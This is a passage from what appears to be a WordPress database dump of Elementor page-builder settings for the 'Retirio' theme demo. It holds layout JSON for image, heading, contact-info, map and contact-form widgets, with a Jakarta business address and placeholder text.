age\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4050,4897,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4051,4897,'_elementor_pro_version','3.8.1'),(4052,4897,'_elementor_css','a:6:{s:4:\"time\";i:1695374238;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4062,4899,'_wp_page_template','elementor_header_footer'),(4063,4899,'_elementor_edit_mode','builder'),(4064,4899,'_elementor_template_type','wp-page'),(4065,4899,'_elementor_version','3.8.1'),(4066,4899,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4067,4899,'_elementor_page_assets','a:0:{}'),(4068,4899,'_elementor_pro_version','3.8.1'),(4069,4900,'_wp_page_template','elementor_header_footer'),(4070,4900,'_elementor_edit_mode','builder'),(4071,4900,'_elementor_template_type','wp-page'),(4072,4900,'_elementor_version','3.8.1'),(4073,4900,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top 